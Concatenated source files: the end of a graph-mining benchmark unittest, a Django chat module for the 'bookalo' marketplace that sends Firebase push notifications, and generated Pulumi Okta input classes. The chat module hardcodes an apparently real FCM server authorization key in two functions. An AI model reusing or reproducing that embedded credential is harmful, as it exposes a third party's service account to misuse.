        )
        cg.run()
        cg.time_stats()

    def test_chemical_min_graph_size_27_support_5_percent(self):
        graph_dataset_size = 340
        file_name = "../graphdata/benchmark_tests/Chemical_340.txt"
        supp = graph_dataset_size * 0.05
        min_size_graph = 27
        cg = closeGraph(
            database_file_name=file_name,
            min_support=supp,
            min_num_vertices=min_size_graph
        )
        cg.run()
        cg.time_stats()

    def test_chemical_min_graph_size_32_support_5_percent(self):
        graph_dataset_size = 340
        file_name = "../graphdata/benchmark_tests/Chemical_340.txt"
        supp = graph_dataset_size * 0.05
        min_size_graph = 32
        cg = closeGraph(
            database_file_name=file_name,
            min_support=supp,
            min_num_vertices=min_size_graph
        )
        cg.run()
        cg.time_stats()


if __name__ == '__main__':
    unittest.main()
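For reference, the `convert_results_format` helper in `ChemicalBenchmarkTests` above only reshapes stringified report rows into tuples so they can be sorted and written out deterministically. A minimal, framework-free sketch of that logic (the sample rows below are made up for illustration):

```python
# Same reshaping as the ChemicalBenchmarkTests helper, but standalone:
# each row [support, description, num_vertices] becomes a tuple.
def convert_results_format(results):
    results_as_tuples = []
    for result in results:
        support, description, num_vertices = result[0], result[1], result[2]
        results_as_tuples.append((support, description, num_vertices))
    return results_as_tuples

# Hypothetical rows, in the shape produced by cg._report_df.to_numpy().astype(str)
rows = [["17", "v 0 1 e 0 1 2", "5"], ["12", "v 0 2", "2"]]
print(sorted(convert_results_format(rows)))
```

Tuples (unlike the original list rows) sort lexicographically without surprises, which is what `updateOutput` relies on.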

# File: bookalo/funciones_chat.py (repo: unizar-30226-2019-08/Backend, MIT license)
from django.shortcuts import render, redirect
from bookalo.pyrebase_settings import db, auth
from bookalo.models import *
from bookalo.serializers import *
#from bookalo.functions import *
from rest_framework import status, permissions
from rest_framework.decorators import api_view, permission_classes
from rest_framework.response import Response
from rest_framework.request import Request
from rest_framework.test import APIRequestFactory
from operator import itemgetter
from django.http import HttpResponse
from datetime import datetime, timedelta, timezone
from django.db.models import Q, Count
from django.contrib.gis.geoip2 import GeoIP2
from math import sin, cos, sqrt, atan2, radians
from decimal import Decimal
from .funciones_usuario import *
import itertools
import requests
import json

def get_list_tokens(user, token_to_omit):
    sessions = Sesion.objects.filter(usuario=user, es_movil=True)
    tokens_movil = []
    for session in sessions:
        if session.token != token_to_omit:
            tokens_movil.append(session.token_fcm)
    sessions = Sesion.objects.filter(usuario=user, es_movil=False)
    tokens_web = []
    for session in sessions:
        if session.token != token_to_omit:
            tokens_web.append(session.token_fcm)
    return {'movil': tokens_movil, 'web': tokens_web}

def get_list_tokens_without_sender(user, token_to_omit):
    sessions = Sesion.objects.filter(usuario=user, es_movil=True)
    tokens_movil = []
    for session in sessions:
        if session.token_fcm != token_to_omit:
            tokens_movil.append(session.token_fcm)
    sessions = Sesion.objects.filter(usuario=user, es_movil=False)
    tokens_web = []
    for session in sessions:
        if session.token_fcm != token_to_omit:
            tokens_web.append(session.token_fcm)
    return {'movil': tokens_movil, 'web': tokens_web}

def CrearChat(token, otroUserUid, productId):
    user_info = auth.get_account_info(token)
    user_uid = user_info['users'][0]['localId']
    user = Usuario.objects.get(uid=user_uid)
    otroUser = Usuario.objects.get(uid=otroUserUid)
    product = Producto.objects.get(pk=int(productId))
    # Check that the chat does not already exist
    try:
        chat = Chat.objects.get(vendedor=otroUser, comprador=user, producto=product)
    except Chat.DoesNotExist:
        chat = Chat.objects.create(vendedor=otroUser, comprador=user, producto=product)
    return chat

def GetChatVendedor(user, ultimo_indice, elementos_pagina):
    chats = Chat.objects.filter(vendedor=user, borrado_vendedor=False, producto__estado_venta=True)
    chats_terminados = Chat.objects.filter(vendedor=user, borrado_vendedor=False, producto__estado_venta=False)
    chats = list(chats) + list(chats_terminados)
    ultimo_indice = int(ultimo_indice)
    elementos_pagina = int(elementos_pagina)
    if elementos_pagina != -1:
        chats = itertools.islice(chats, ultimo_indice, ultimo_indice + elementos_pagina)
    return ChatSerializer(chats, many=True, read_only=True, context={"user": user})

def GetChatComprador(user, ultimo_indice, elementos_pagina):
    chats = Chat.objects.filter(comprador=user, borrado_comprador=False, producto__estado_venta=True)
    chats_terminados = Chat.objects.filter(comprador=user, borrado_comprador=False, producto__estado_venta=False)
    chats = list(chats) + list(chats_terminados)
    ultimo_indice = int(ultimo_indice)
    elementos_pagina = int(elementos_pagina)
    if elementos_pagina != -1:
        chats = itertools.islice(chats, ultimo_indice, ultimo_indice + elementos_pagina)
    return ChatSerializer(chats, many=True, read_only=True, context={"user": user})

def CrearMensaje(token, chat_id, message):
    try:
        user = get_user(token)
        chat = Chat.objects.get(pk=int(chat_id))
        mensaje = Mensaje(texto=message, chat_asociado=chat, emisor=user)
        mensaje.save()
        chat.borrado_vendedor = False
        chat.borrado_comprador = False
        chat.save()
        return mensaje
    except Exception:
        return None

def CrearNotificiacion(usuario, message):
    try:
        NotificacionesPendientes.objects.create(usuario_pendiente=usuario, descripcion_notificacion=message)
        return True
    except Exception:
        return False

def GetUserMessages(chat_pk, user, ultimo_indice, elementos_pagina):
    try:
        try:
            chat = Chat.objects.get(pk=int(chat_pk))
            if chat.vendedor == user:
                chat.num_pendientes_vendedor = 0
                chat.save()
            elif chat.comprador == user:
                chat.num_pendientes_comprador = 0
                chat.save()
            else:
                chat.save()
            ultimo_indice = int(ultimo_indice)
            elementos_pagina = int(elementos_pagina)
            if elementos_pagina != -1:
                messages = Mensaje.objects.filter(chat_asociado__pk=chat_pk).order_by('-hora')
                messages = itertools.islice(messages, ultimo_indice, ultimo_indice + elementos_pagina)
            else:
                messages = Mensaje.objects.filter(chat_asociado__pk=chat_pk).order_by('hora')
            return MensajeSerializer(messages, many=True, read_only=True, context={"user": user})
        except Exception:
            messages = Mensaje.objects.filter(chat_asociado__pk=chat_pk).order_by('hora')
            if elementos_pagina != -1:
                messages = itertools.islice(messages, ultimo_indice, ultimo_indice + elementos_pagina)
            return MensajeSerializer(messages, many=True, read_only=True, context={"user": user})
    except Exception:
        return None

def GetChatInfoWeb(chat_id):
    try:
        chat = Chat.objects.get(pk=int(chat_id))
        product = chat.producto
        seller = chat.vendedor
        buyer = chat.comprador
        return {'comprador': UserSerializer(buyer).data, 'vendedor': UserSerializer(seller).data, 'producto': ProductoSerializer(product).data}
    except Exception:
        return {'comprador': '', 'vendedor': '', 'producto': ''}

def BorradoChat(token, chatId):
    user_info = auth.get_account_info(token)
    user_uid = user_info['users'][0]['localId']
    user = Usuario.objects.get(uid=user_uid)
    chat = Chat.objects.get(id=chatId)
    if chat.vendedor == user:
        chat.borrado_vendedor = True
        chat.save()
        # Delete the chat only once both sides have marked it as removed
        if chat.borrado_comprador:
            chat.delete()
        return 'Ok'
    elif chat.comprador == user:
        chat.borrado_comprador = True
        chat.save()
        if chat.borrado_vendedor:
            chat.delete()
        return 'Ok'
    else:
        return 'Unauthorized'

def SendFCMMessage(chat_id, message, token_emisor, emisor, soy_vendedor, receptor):
    # Defined before the try block so the error handler below can reuse them.
    headers = {"Authorization": "key=AAAARwXiWF8:APA91bEvM5nPUaBpR217T3ZjRqCGvYadxmHQXQSIgGMkWn_BeAOnnLZNv2DtVmCwF-D_sJEsh4CrDg6S0S4jl9tsImUnqzEGAssiizIF4U1h0AVsgyzzU8to0q0QlLx2cFu2673OvKuH", "Content-Type": "application/json"}
    URL = 'https://fcm.googleapis.com/fcm/send'
    try:
        chat_obj = Chat.objects.get(pk=int(chat_id))
        if chat_obj.vendedor == emisor:
            chat_obj.num_pendientes_comprador = chat_obj.num_pendientes_comprador + 1
            chat_obj.save()
        else:
            chat_obj.num_pendientes_vendedor = chat_obj.num_pendientes_vendedor + 1
            chat_obj.save()
        # Code for the message receiver
        chat = ChatSerializer(chat_obj, context={"user": receptor}).data
        mensaje = MensajeSerializer(message, context={"user": receptor}).data
        tokens_receptor = get_list_tokens(receptor, "NONE")
        if tokens_receptor['movil']:
            data = {
                "notification": {
                    "title": "Bookalo",
                    "body": "¡Hola " + receptor.nombre + "! La venta se ha cerrado para el producto " + chat_obj.producto.nombre + ". ¡Valora a " + emisor.nombre + "!",
                    "icon": "https://bookalo.es/media/bookalo_logo.png"
                },
                "registration_ids": tokens_receptor['movil'],
                "data": {
                    "chat": chat,
                    "soy_vendedor": soy_vendedor,
                    "mensaje": mensaje,
                }
            }
            data = json.dumps(data)
            requests.post(url=URL, data=data, headers=headers)
            data = {
                "registration_ids": tokens_receptor['movil'],
                "data": {
                    "chat": chat,
                    "soy_vendedor": soy_vendedor,
                    "mensaje": mensaje,
                }
            }
            data = json.dumps(data)
            requests.post(url=URL, data=data, headers=headers)
        if tokens_receptor['web']:
            data = {
                "notification": {
                    "title": "Bookalo",
                    "body": "¡Hola " + receptor.nombre + "! La venta se ha cerrado para el producto " + chat_obj.producto.nombre + ". ¡Valora a " + emisor.nombre + "!",
                    "icon": "https://bookalo.es/media/bookalo_logo.png"
                },
                "registration_ids": tokens_receptor['web'],
                "data": {
                    "chat": chat,
                    "soy_vendedor": soy_vendedor,
                    "mensaje": mensaje,
                }
            }
            data = json.dumps(data)
            requests.post(url=URL, data=data, headers=headers)
        # Code for the message sender
        chat = ChatSerializer(chat_obj, context={"user": emisor}).data
        mensaje = MensajeSerializer(message, context={"user": emisor}).data
        tokens_emisor = get_list_tokens(emisor, token_emisor)
        if tokens_emisor['movil']:
            data = {
                "notification": {
                    "title": "Bookalo",
                    "body": "¡Hola " + emisor.nombre + "! La venta se ha cerrado para el producto " + chat_obj.producto.nombre + ". ¡Valora a " + receptor.nombre + "!",
                    "icon": "https://bookalo.es/media/bookalo_logo.png"
                },
                "registration_ids": tokens_emisor['movil'],
                "data": {
                    "chat": chat,
                    "soy_vendedor": not soy_vendedor,
                    "mensaje": mensaje,
                }
            }
            data = json.dumps(data)
            requests.post(url=URL, data=data, headers=headers)
            data = {
                "registration_ids": tokens_emisor['movil'],
                "data": {
                    "chat": chat,
                    "soy_vendedor": not soy_vendedor,
                    "mensaje": mensaje,
                }
            }
            data = json.dumps(data)
            requests.post(url=URL, data=data, headers=headers)
        if tokens_emisor['web']:
            data = {
                "notification": {
                    "title": "Bookalo",
                    "body": "¡Hola " + emisor.nombre + "! La venta se ha cerrado para el producto " + chat_obj.producto.nombre + ". ¡Valora a " + receptor.nombre + "!",
                    "icon": "https://bookalo.es/media/bookalo_logo.png"
                },
                "registration_ids": tokens_emisor['web'],
                "data": {
                    "chat": chat,
                    "soy_vendedor": not soy_vendedor,
                    "mensaje": mensaje,
                }
            }
            data = json.dumps(data)
            requests.post(url=URL, data=data, headers=headers)
        return True
    except Exception as ex:
        tokens_emisor = get_list_tokens(emisor, token_emisor)
        data = {
            # FCM expects a flat list of device tokens here.
            "registration_ids": tokens_emisor['movil'] + tokens_emisor['web'],
            "notification": {
                "title": "Bookalo: Fallo en envio de mensaje",
                "body": "Un error ocurrió mientras enviabas el mensaje - " + message.texto + " -: " + str(ex)
            }
        }
        data = json.dumps(data)
        requests.post(url=URL, data=data, headers=headers)
        return False

def SendFCMChatMessage(chat_id, message, token_emisor, emisor, soy_vendedor, receptor):
    # Defined before the try block so the error handler below can reuse them.
    headers = {"Authorization": "key=AAAARwXiWF8:APA91bEvM5nPUaBpR217T3ZjRqCGvYadxmHQXQSIgGMkWn_BeAOnnLZNv2DtVmCwF-D_sJEsh4CrDg6S0S4jl9tsImUnqzEGAssiizIF4U1h0AVsgyzzU8to0q0QlLx2cFu2673OvKuH", "Content-Type": "application/json"}
    URL = 'https://fcm.googleapis.com/fcm/send'
    try:
        chat_obj = Chat.objects.get(pk=int(chat_id))
        if chat_obj.vendedor == emisor:
            chat_obj.num_pendientes_comprador = chat_obj.num_pendientes_comprador + 1
            chat_obj.save()
        else:
            chat_obj.num_pendientes_vendedor = chat_obj.num_pendientes_vendedor + 1
            chat_obj.save()
        # Code for the message receiver
        chat = ChatSerializer(chat_obj, context={"user": receptor}).data
        mensaje = MensajeSerializer(message, context={"user": receptor}).data
        tokens_receptor = get_list_tokens_without_sender(receptor, "NONE")
        if tokens_receptor['movil']:
            data = {
                "notification": {
                    "title": emisor.nombre + ' - ' + chat_obj.producto.nombre,
                    "body": message.texto,
                    "icon": "https://bookalo.es/media/bookalo_logo.png"
                },
                "registration_ids": tokens_receptor['movil'],
                "data": {
                    "chat": chat,
                    "soy_vendedor": not soy_vendedor,
                    "mensaje": mensaje,
                    "click_action": "FLUTTER_NOTIFICATION_CLICK",
                }
            }
            data = json.dumps(data)
            requests.post(url=URL, data=data, headers=headers)
            data = {
                "registration_ids": tokens_receptor['movil'],
                "data": {
                    "chat": chat,
                    "soy_vendedor": not soy_vendedor,
                    "mensaje": mensaje,
                    "click_action": "FLUTTER_NOTIFICATION_CLICK",
                }
            }
            data = json.dumps(data)
            requests.post(url=URL, data=data, headers=headers)
        if tokens_receptor['web']:
            data = {
                "notification": {
                    "title": emisor.nombre + ' - ' + chat_obj.producto.nombre,
                    "body": message.texto,
                    "icon": "https://bookalo.es/media/bookalo_logo.png"
                },
                "registration_ids": tokens_receptor['web'],
                "data": {
                    "chat": chat,
                    "soy_vendedor": not soy_vendedor,
                    "mensaje": mensaje,
                }
            }
            data = json.dumps(data)
            requests.post(url=URL, data=data, headers=headers)
        # Code for the message sender
        chat = ChatSerializer(chat_obj, context={"user": emisor}).data
        mensaje = MensajeSerializer(message, context={"user": emisor}).data
        tokens_emisor = get_list_tokens_without_sender(emisor, token_emisor)
        if tokens_emisor['movil']:
            data = {
                "notification": {
                    "title": receptor.nombre + ' - ' + chat_obj.producto.nombre,
                    "body": message.texto,
                    "icon": "https://bookalo.es/media/bookalo_logo.png"
                },
                "registration_ids": tokens_emisor['movil'],
                "data": {
                    "chat": chat,
                    "soy_vendedor": soy_vendedor,
                    "mensaje": mensaje,
                }
            }
            data = json.dumps(data)
            requests.post(url=URL, data=data, headers=headers)
            data = {
                "registration_ids": tokens_emisor['movil'],
                "data": {
                    "chat": chat,
                    "soy_vendedor": soy_vendedor,
                    "mensaje": mensaje,
                }
            }
            data = json.dumps(data)
            requests.post(url=URL, data=data, headers=headers)
        if tokens_emisor['web']:
            data = {
                "notification": {
                    "title": emisor.nombre + ' - ' + chat_obj.producto.nombre,
                    "body": message.texto,
                    "icon": "https://bookalo.es/media/bookalo_logo.png"
                },
                "registration_ids": tokens_emisor['web'],
                "data": {
                    "chat": chat,
                    "soy_vendedor": soy_vendedor,
                    "mensaje": mensaje,
                }
            }
            data = json.dumps(data)
            requests.post(url=URL, data=data, headers=headers)
        return True
    except Exception as ex:
        data = {
            "registration_ids": [token_emisor],
            "notification": {
                "title": "Bookalo: Fallo en envio de mensaje",
                "body": "Un error ocurrió mientras enviabas el mensaje - " + message.texto + " -: " + str(ex)
            }
        }
        data = json.dumps(data)
        requests.post(url=URL, data=data, headers=headers)
        return False
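The two `get_list_tokens*` helpers above just partition a user's session tokens by platform, skipping one token. A minimal, Django-free sketch of that logic (the `Session` namedtuple below is a stand-in for the `Sesion` model, introduced here purely for illustration):

```python
from collections import namedtuple

# Illustrative stand-in for the Django Sesion model (assumption, not the real model).
Session = namedtuple("Session", ["token_fcm", "es_movil"])

def partition_tokens(sessions, token_to_omit):
    # Split FCM tokens into mobile and web lists, omitting the sender's own token,
    # mirroring get_list_tokens_without_sender.
    movil = [s.token_fcm for s in sessions if s.es_movil and s.token_fcm != token_to_omit]
    web = [s.token_fcm for s in sessions if not s.es_movil and s.token_fcm != token_to_omit]
    return {'movil': movil, 'web': web}

sessions = [Session("tok-a", True), Session("tok-b", False), Session("tok-c", True)]
print(partition_tokens(sessions, "tok-c"))
```

The dict shape (`'movil'` / `'web'` keys) matches what `SendFCMMessage` and `SendFCMChatMessage` consume when building their `registration_ids` lists.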

# File: sdk/python/pulumi_okta/app/_inputs.py (repo: pulumi/pulumi-okta, ECL-2.0/Apache-2.0 licenses)
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities

__all__ = [
    'AutoLoginUserArgs',
    'BasicAuthUserArgs',
    'BookmarkUserArgs',
    'OAuthGroupsClaimArgs',
    'OAuthJwkArgs',
    'OAuthUserArgs',
    'SamlAttributeStatementArgs',
    'SamlUserArgs',
    'SecurePasswordStoreUserArgs',
    'SwaUserArgs',
    'ThreeFieldUserArgs',
    'UserSchemaArrayOneOfArgs',
    'UserSchemaOneOfArgs',
    'GetSamlAttributeStatementArgs',
]


@pulumi.input_type
class AutoLoginUserArgs:
    def __init__(__self__, *,
                 id: Optional[pulumi.Input[str]] = None,
                 password: Optional[pulumi.Input[str]] = None,
                 scope: Optional[pulumi.Input[str]] = None,
                 username: Optional[pulumi.Input[str]] = None):
        if id is not None:
            pulumi.set(__self__, "id", id)
        if password is not None:
            pulumi.set(__self__, "password", password)
        if scope is not None:
            pulumi.set(__self__, "scope", scope)
        if username is not None:
            pulumi.set(__self__, "username", username)

    @property
    @pulumi.getter
    def id(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "id")

    @id.setter
    def id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "id", value)

    @property
    @pulumi.getter
    def password(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "password")

    @password.setter
    def password(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "password", value)

    @property
    @pulumi.getter
    def scope(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "scope")

    @scope.setter
    def scope(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "scope", value)

    @property
    @pulumi.getter
    def username(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "username")

    @username.setter
    def username(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "username", value)


@pulumi.input_type
class BasicAuthUserArgs:
    def __init__(__self__, *,
                 id: Optional[pulumi.Input[str]] = None,
                 password: Optional[pulumi.Input[str]] = None,
                 scope: Optional[pulumi.Input[str]] = None,
                 username: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] id: ID of the Application.
        """
        if id is not None:
            pulumi.set(__self__, "id", id)
        if password is not None:
            pulumi.set(__self__, "password", password)
        if scope is not None:
            pulumi.set(__self__, "scope", scope)
        if username is not None:
            pulumi.set(__self__, "username", username)

    @property
    @pulumi.getter
    def id(self) -> Optional[pulumi.Input[str]]:
        """
        ID of the Application.
        """
        return pulumi.get(self, "id")

    @id.setter
    def id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "id", value)

    @property
    @pulumi.getter
    def password(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "password")

    @password.setter
    def password(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "password", value)

    @property
    @pulumi.getter
    def scope(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "scope")

    @scope.setter
    def scope(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "scope", value)

    @property
    @pulumi.getter
    def username(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "username")

    @username.setter
    def username(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "username", value)


@pulumi.input_type
class BookmarkUserArgs:
    def __init__(__self__, *,
                 id: Optional[pulumi.Input[str]] = None,
                 password: Optional[pulumi.Input[str]] = None,
                 scope: Optional[pulumi.Input[str]] = None,
                 username: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] id: ID of the Application.
        """
        if id is not None:
            pulumi.set(__self__, "id", id)
        if password is not None:
            pulumi.set(__self__, "password", password)
        if scope is not None:
            pulumi.set(__self__, "scope", scope)
        if username is not None:
            pulumi.set(__self__, "username", username)

    @property
    @pulumi.getter
    def id(self) -> Optional[pulumi.Input[str]]:
        """
        ID of the Application.
        """
        return pulumi.get(self, "id")

    @id.setter
    def id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "id", value)

    @property
    @pulumi.getter
    def password(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "password")

    @password.setter
    def password(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "password", value)

    @property
    @pulumi.getter
    def scope(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "scope")

    @scope.setter
    def scope(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "scope", value)

    @property
    @pulumi.getter
    def username(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "username")

    @username.setter
    def username(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "username", value)


@pulumi.input_type
class OAuthGroupsClaimArgs:
    def __init__(__self__, *,
                 name: pulumi.Input[str],
                 type: pulumi.Input[str],
                 value: pulumi.Input[str],
                 filter_type: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] name: Name of the claim that will be used in the token.
        :param pulumi.Input[str] type: Groups claim type. Valid values: `"FILTER"`, `"EXPRESSION"`.
        :param pulumi.Input[str] value: Value of the claim. Can be an Okta Expression Language statement that evaluates at the time the token is minted.
        :param pulumi.Input[str] filter_type: Groups claim filter. Can only be set if type is `"FILTER"`. Valid values: `"EQUALS"`, `"STARTS_WITH"`, `"CONTAINS"`, `"REGEX"`.
        """
        pulumi.set(__self__, "name", name)
        pulumi.set(__self__, "type", type)
        pulumi.set(__self__, "value", value)
        if filter_type is not None:
            pulumi.set(__self__, "filter_type", filter_type)

    @property
    @pulumi.getter
    def name(self) -> pulumi.Input[str]:
        """
        Name of the claim that will be used in the token.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: pulumi.Input[str]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        """
        Groups claim type. Valid values: `"FILTER"`, `"EXPRESSION"`.
        """
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: pulumi.Input[str]):
        pulumi.set(self, "type", value)

    @property
    @pulumi.getter
    def value(self) -> pulumi.Input[str]:
        """
        Value of the claim. Can be an Okta Expression Language statement that evaluates at the time the token is minted.
        """
        return pulumi.get(self, "value")

    @value.setter
    def value(self, value: pulumi.Input[str]):
        pulumi.set(self, "value", value)

    @property
    @pulumi.getter(name="filterType")
    def filter_type(self) -> Optional[pulumi.Input[str]]:
        """
        Groups claim filter. Can only be set if type is `"FILTER"`. Valid values: `"EQUALS"`, `"STARTS_WITH"`, `"CONTAINS"`, `"REGEX"`.
        """
        return pulumi.get(self, "filter_type")

    @filter_type.setter
    def filter_type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "filter_type", value)


@pulumi.input_type
class OAuthJwkArgs:
    def __init__(__self__, *,
                 kid: pulumi.Input[str],
                 kty: pulumi.Input[str],
                 e: Optional[pulumi.Input[str]] = None,
                 n: Optional[pulumi.Input[str]] = None):
        pulumi.set(__self__, "kid", kid)
        pulumi.set(__self__, "kty", kty)
        if e is not None:
            pulumi.set(__self__, "e", e)
        if n is not None:
            pulumi.set(__self__, "n", n)

    @property
    @pulumi.getter
    def kid(self) -> pulumi.Input[str]:
        return pulumi.get(self, "kid")

    @kid.setter
    def kid(self, value: pulumi.Input[str]):
        pulumi.set(self, "kid", value)

    @property
    @pulumi.getter
    def kty(self) -> pulumi.Input[str]:
        return pulumi.get(self, "kty")

    @kty.setter
    def kty(self, value: pulumi.Input[str]):
        pulumi.set(self, "kty", value)

    @property
    @pulumi.getter
    def e(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "e")

    @e.setter
    def e(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "e", value)

    @property
    @pulumi.getter
    def n(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "n")

    @n.setter
    def n(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "n", value)


@pulumi.input_type
class OAuthUserArgs:
    def __init__(__self__, *,
                 id: Optional[pulumi.Input[str]] = None,
                 password: Optional[pulumi.Input[str]] = None,
                 scope: Optional[pulumi.Input[str]] = None,
                 username: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] id: ID of the application.
        """
        if id is not None:
            pulumi.set(__self__, "id", id)
        if password is not None:
            pulumi.set(__self__, "password", password)
        if scope is not None:
            pulumi.set(__self__, "scope", scope)
        if username is not None:
            pulumi.set(__self__, "username", username)

    @property
    @pulumi.getter
    def id(self) -> Optional[pulumi.Input[str]]:
        """
        ID of the application.
        """
        return pulumi.get(self, "id")

    @id.setter
    def id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "id", value)

    @property
    @pulumi.getter
    def password(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "password")

    @password.setter
    def password(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "password", value)

    @property
    @pulumi.getter
    def scope(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "scope")

    @scope.setter
    def scope(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "scope", value)

    @property
    @pulumi.getter
    def username(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "username")

    @username.setter
    def username(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "username", value)
@pulumi.input_type
class SamlAttributeStatementArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
filter_type: Optional[pulumi.Input[str]] = None,
filter_value: Optional[pulumi.Input[str]] = None,
namespace: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None,
values: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
:param pulumi.Input[str] name: The name of the attribute statement.
:param pulumi.Input[str] filter_type: Type of group attribute filter. Valid values are: `"STARTS_WITH"`, `"EQUALS"`, `"CONTAINS"`, or `"REGEX"`
:param pulumi.Input[str] filter_value: Filter value to use.
:param pulumi.Input[str] namespace: The attribute namespace. It can be set to `"urn:oasis:names:tc:SAML:2.0:attrname-format:unspecified"`, `"urn:oasis:names:tc:SAML:2.0:attrname-format:uri"`, or `"urn:oasis:names:tc:SAML:2.0:attrname-format:basic"`.
:param pulumi.Input[str] type: The type of attribute statement value. Valid values are: `"EXPRESSION"` or `"GROUP"`. Default is `"EXPRESSION"`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] values: Array of values to use.
"""
pulumi.set(__self__, "name", name)
if filter_type is not None:
pulumi.set(__self__, "filter_type", filter_type)
if filter_value is not None:
pulumi.set(__self__, "filter_value", filter_value)
if namespace is not None:
pulumi.set(__self__, "namespace", namespace)
if type is not None:
pulumi.set(__self__, "type", type)
if values is not None:
pulumi.set(__self__, "values", values)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
The name of the attribute statement.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="filterType")
def filter_type(self) -> Optional[pulumi.Input[str]]:
"""
Type of group attribute filter. Valid values are: `"STARTS_WITH"`, `"EQUALS"`, `"CONTAINS"`, or `"REGEX"`
"""
return pulumi.get(self, "filter_type")
@filter_type.setter
def filter_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "filter_type", value)
@property
@pulumi.getter(name="filterValue")
def filter_value(self) -> Optional[pulumi.Input[str]]:
"""
Filter value to use.
"""
return pulumi.get(self, "filter_value")
@filter_value.setter
def filter_value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "filter_value", value)
@property
@pulumi.getter
def namespace(self) -> Optional[pulumi.Input[str]]:
"""
The attribute namespace. It can be set to `"urn:oasis:names:tc:SAML:2.0:attrname-format:unspecified"`, `"urn:oasis:names:tc:SAML:2.0:attrname-format:uri"`, or `"urn:oasis:names:tc:SAML:2.0:attrname-format:basic"`.
"""
return pulumi.get(self, "namespace")
@namespace.setter
def namespace(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "namespace", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
"""
The type of attribute statement value. Valid values are: `"EXPRESSION"` or `"GROUP"`. Default is `"EXPRESSION"`.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def values(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Array of values to use.
"""
return pulumi.get(self, "values")
@values.setter
def values(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "values", value)
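The `filter_type`/`filter_value` pair above selects which groups a `GROUP`-type statement emits. The actual matching happens server-side in the identity provider; the sketch below is only a pure-Python illustration of how the four documented filter types behave (the `matches` helper is hypothetical, not part of the provider):

```python
import re

def matches(filter_type: str, filter_value: str, group_name: str) -> bool:
    """Illustrative stand-in for server-side group filtering."""
    if filter_type == "STARTS_WITH":
        return group_name.startswith(filter_value)
    if filter_type == "EQUALS":
        return group_name == filter_value
    if filter_type == "CONTAINS":
        return filter_value in group_name
    if filter_type == "REGEX":
        return re.search(filter_value, group_name) is not None
    raise ValueError(f"unknown filter_type: {filter_type}")

print(matches("STARTS_WITH", "eng-", "eng-platform"))  # True
print(matches("REGEX", r"^eng-", "sales-emea"))        # False
```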
@pulumi.input_type
class SamlUserArgs:
def __init__(__self__, *,
id: Optional[pulumi.Input[str]] = None,
password: Optional[pulumi.Input[str]] = None,
scope: Optional[pulumi.Input[str]] = None,
username: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] id: ID of the application.
"""
if id is not None:
pulumi.set(__self__, "id", id)
if password is not None:
pulumi.set(__self__, "password", password)
if scope is not None:
pulumi.set(__self__, "scope", scope)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
"""
ID of the application.
"""
return pulumi.get(self, "id")
@id.setter
